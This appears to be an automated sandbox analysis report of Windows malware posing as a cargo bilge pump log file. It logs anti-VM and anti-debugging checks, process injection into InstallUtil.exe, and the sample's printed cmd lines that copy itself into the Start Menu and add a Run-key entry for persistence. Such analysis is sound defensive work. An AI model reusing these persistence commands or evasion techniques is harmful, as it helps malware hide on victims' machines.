Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 0000000E.00000002.3568807416.000000000411C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.4151678724.0000000003321000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 37
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 39
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 39
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 37	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 39	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 39	Jump to behavior

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Memory allocated: 2460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Memory allocated: 2680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Memory allocated: 2460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory allocated: 1320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory allocated: 2F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory allocated: 7FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory allocated: 8FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory allocated: 9190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory allocated: A190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory allocated: A500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory allocated: B500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 32F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 3120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Memory allocated: A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Memory allocated: 26D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Memory allocated: 46D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Memory allocated: B50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Memory allocated: 2800000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Memory allocated: 2580000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Window / User API: threadDelayed 589	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Window / User API: threadDelayed 9246	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Window / User API: threadDelayed 2334	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Window / User API: threadDelayed 7516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 767	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 5413	Jump to behavior

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe TID: 7580	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe TID: 7580	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 7628	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 7628	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 8040	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 8040	Thread sleep time: -38000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6352	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6352	Thread sleep time: -37000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe TID: 5352	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe TID: 5352	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3672	Thread sleep count: 767 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3672	Thread sleep count: 5413 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -98891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -98766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -98625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -98516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -98391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -98281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -98172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -98062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -97948s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -97844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -97734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -97624s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -97516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -97406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -97297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -97187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -97078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -96969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -96859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -96750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4112	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe TID: 5088	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe TID: 2412	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97948	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97624	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Thread delayed: delay time: 922337203685477

Source: InstallUtil.exe, 00000010.00000002.4151678724.0000000003321000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.000000000388E000.00000004.00000800.00020000.00000000.sdmp, SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046079068.00000000050C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: VBoxTray
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046079068.00000000050C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
Source: InstallUtil.exe, 00000010.00000002.4151678724.0000000003321000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: InstallUtil.exe, 0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000010.00000002.4157281481.0000000006650000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 16_2_019570B8 CheckRemoteDebuggerPresent,

16_2_019570B8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7B0000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7B0000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7B2000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7EE000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7F0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 496008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 111E008	Jump to behavior

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 39 > nul && copy "C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe" && ping 127.0.0.1 -n 39 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 37	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 39	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 39	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 39 > nul && copy "c:\users\user\desktop\sg foundation sg24004-01cz24001-01 daily cargo hold bilge pump out log ==final report==.exe" "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\dll.exe" && ping 127.0.0.1 -n 39 > nul && "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\dll.exe"
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 39 > nul && copy "c:\users\user\desktop\sg foundation sg24004-01cz24001-01 daily cargo hold bilge pump out log ==final report==.exe" "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\dll.exe" && ping 127.0.0.1 -n 39 > nul && "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\dll.exe"			Jump to behavior

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
